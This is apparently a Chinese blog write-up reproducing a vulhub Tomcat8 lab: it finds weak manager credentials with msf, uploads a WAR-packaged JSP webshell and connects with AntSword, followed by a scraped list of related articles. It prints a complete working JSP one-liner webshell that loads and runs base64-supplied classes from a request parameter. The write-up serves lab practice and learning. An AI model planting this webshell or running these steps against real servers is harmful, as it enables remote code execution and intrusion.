vulhub Tomcat8漏洞复现
vulhub Tomcat8漏洞复现
搭建一下Tomcat8这个漏洞的环境
查看端口发现是8080端口开放
可以看到环境已经搭建好了
尝试登录问题页面,发现需要输入密码http://...:8080/manager/html
用msf
得到弱口令
成功登入后台
此处可上传文件,尝试上传webshell
上传jsp一句话木马,打包为war格式
上传出现报错,403是无权访问不代表没有
发现已经上传上去了
访问该目录,未找到shell.jsp
尝试用命令去打包war包,再次访问,成功
利用蚁剑去连接
<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}%><%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}%>
#一句话木马
vulhub Tomcat8漏洞复现相关推荐
- [Vulhub] Weblogic 漏洞复现
文章目录 Weblogic 常规渗透测试环境 0x00 测试环境 0x01 弱口令 0x02 任意文件读取漏洞的利用 0x03 后台上传webshell Weblogic WLS Core Compo ...
- vulhub中漏洞复现1
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的 ...
- docker kali安装mysql_kali安装docker(有效详细的教程) ——vulhub漏洞复现 001
前记: 博主有着多次安装docker的丰富经验,曾经为了在kali成功安装docker花费不少时间.在kali2016.3一直到最新的kali2019.4都通吃!所以跟着下面的步骤走,绝对不会出错.( ...
- 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现
楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...
- Vulhub靶场之struts2漏洞复现
简介 struts2漏洞中属s2系列杀伤力最大,可以造成远程命令执行漏洞. Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架.Apache Struts于2020年 ...
- 【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...
- vulhub中Spring之CVE-2017-8046漏洞复现
vulhub中Spring之CVE-2017-8046漏洞复现 Spring Data Rest 远程命令执行漏洞(CVE-2017-8046) 漏洞复现 漏洞说明 漏洞利用条件和方式 漏洞影响范围 ...
- 渗透测试-----信息收集(概述、whois、子域名查询、爆破、vulhub域名传送漏洞复现、kali安装docker)
文章目录 渗透测试 信息收集 1. 概述 2. 供练手的网站 3. whois查询 4. 子域名查询 域传送漏洞 1. 概述 2. 解决办法 3. vulhub漏洞复现 4. 子域名爆破 渗透测试 信 ...
- tomcat8弱口令漏洞复现与getshell
目录 一.环境搭建 1.下载vulhub 2.启动环境 二.漏洞复现 1.使用默认用户名密码tomcat:tomcat登录http://your-ip:8080/manager/html 2.上传we ...
- (一)vulhub专栏:FastJson1.2.24、1.2.27漏洞复现
入职大厂必会 写在前面的话:请注意本篇博客最后面的附(注意java版本),本篇博客采用的是LDAP服务getshell,rmi同理.阅读本篇博客需了解fastjson,ldap,rmi. 启动靶场 在 ...
最新文章
- Python GuidLine(python编程规范) PEP8
- nyoj------203三国志
- 无线节能组的充电问题
- 介绍一种很棒的wince 如何替换系统声音的方法
- 容器监控实践—Heapster
- 20211130 正定矩阵的几个不等式
- ASP.NET Core Web API中使用Swagger
- [Java基础]获取Class类的对象
- hdu1695 GCD(莫比乌斯反演)
- 认识常见的显卡外接口
- java学习之道 --- 如何学习java?
- 把linux,ssh客户端蓝色变成绿色
- DNS测试 nslookup
- 第一位让我敬佩的学者张维迎
- Java实现合并word文档并打开合并后文档
- AJAX实现页面登录及注册用户名验证
- RHCE6.0那点事----仅供参考
- android上传sd卡文件格式,Android开发学习:向模拟器的sdcard中添加文件
- 我国卫星导航工程将推动“羲和系统”建设
- 网传国内互联网梯队划分,网友坐不住了!
热门文章
- 【Ansys Workbench】—直接优化
- webstorm小程序插件和中文插件
- 线性规划问题的求解——Excel和python编程
- 用pod安装swiftyJson的一个实例
- con 元器件符号_protues的元件符号名称
- 打印机打印字体轻,像针式的故障处理(图)
- java与工业控制_JAVA工业控制系统方案
- 在使用vue-video-player时,切换页面浏览器报错:TypeError: this.el_.vjs_getProperty is not a function**
- 工具篇:金蝶K3工具下载
- 渗透测试常用端口利用总结